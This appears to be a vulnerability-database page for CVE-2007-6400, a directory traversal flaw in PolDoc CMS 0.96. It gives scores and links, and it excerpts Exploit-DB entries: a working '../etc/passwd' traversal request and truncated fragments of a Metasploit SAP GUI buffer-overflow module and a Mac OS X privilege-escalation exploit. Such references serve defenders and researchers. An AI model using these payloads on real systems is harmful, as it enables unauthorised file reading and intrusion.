CVE-2007-6400
Published 2007-12-17
Priority: P4 (28), medium, 5 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:N/A:N
EXPLOIT
EPSS: 2.83% (84.8th percentile)
Directory traversal vulnerability in download_file.php in PolDoc CMS (aka PDDMS) 0.96 allows remote attackers to read arbitrary files via a .. (dot dot) or absolute pathname in the filename parameter.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| poldoc | poldoc_document_management_system | — | — |
No detection rules found.
Exploit-DB
EnjoySAP SAP GUI - ActiveX Control Buffer Overflow (Metasploit)
exploitdb · 2010-06-15 · CVE-2007-3605
---
##
# $Id: enjoysapgui_preparetoposthtml.rb 9525 2010-06-15 07:18:08Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'EnjoySAP SAP GUI ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in SAP KWEdit ActiveX
Control (kwedit.dll 6400.1.1.41) provided by EnjoySAP GUI. By sending
an overly long string to the "PrepareToPostHTML()" method, an attacker
may be able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Auth
Exploit-DB
PolDoc CMS 0.96 - 'download_file.php' File Disclosure
exploitdb · 2007-12-08 · CVE-2007-6400
---
PolDoc CMS 0.96 (download_file.php filename) Remote File Disclosure Vulnerability
D . Script : http://sourceforge.net/project/showfiles.php?group_id=100272
POC : /download_file.php?filename=../../../../../../../../etc/passwd
# milw0rm.com [2007-12-08]
Exploit-DB
Apple Mac OSX 10.4.8 (8L2127) - 'crashdump' Local Privilege Escalation
exploitdb · 2007-01-29 · CVE-2007-0467
---
#!/usr/bin/ruby
# Copyright (c) 2007 Kevin Finisterre
# Lance M. Havok
# All pwnage reserved.
#
# 1) Stop crashdump from writing to ~/Library/Logs via chmod 000 ~/Library/Logs/CrashReporter
# 2) Make symlink to /Library/Logs/CrashReporter/knownprog.crash.log
# 3) Create a program with a modified __LINKEDIT segment that influences crashreporter output
#
# 0000320: 3800 0000 5f5f 4c49 4e4b 4544 4954 0000 8...__LINKEDIT..
# 0000330: 0000 0000 0040 0000 0010 0000 0030 0000 .....@.......0..
# 0000340: 2004 0000 0300 0000 0100 0000 0000 0000 ...............
# 0000350: 0400 0000 0e00 0000 1c00 0000 0c00 0000 ................
# 0000360: 2f75 7372 2f6c 6962 2f64 796c 6400 0000 /usr/lib/dyld...
# 0000370: 0c00 0000 3400 000
No writeups or analysis indexed.
http://secunia.com/advisories/28013
http://www.securityfocus.com/bid/26775
http://www.vupen.com/english/advisories/2007/4159
https://exchange.xforce.ibmcloud.com/vulnerabilities/38937
https://www.exploit-db.com/exploits/4704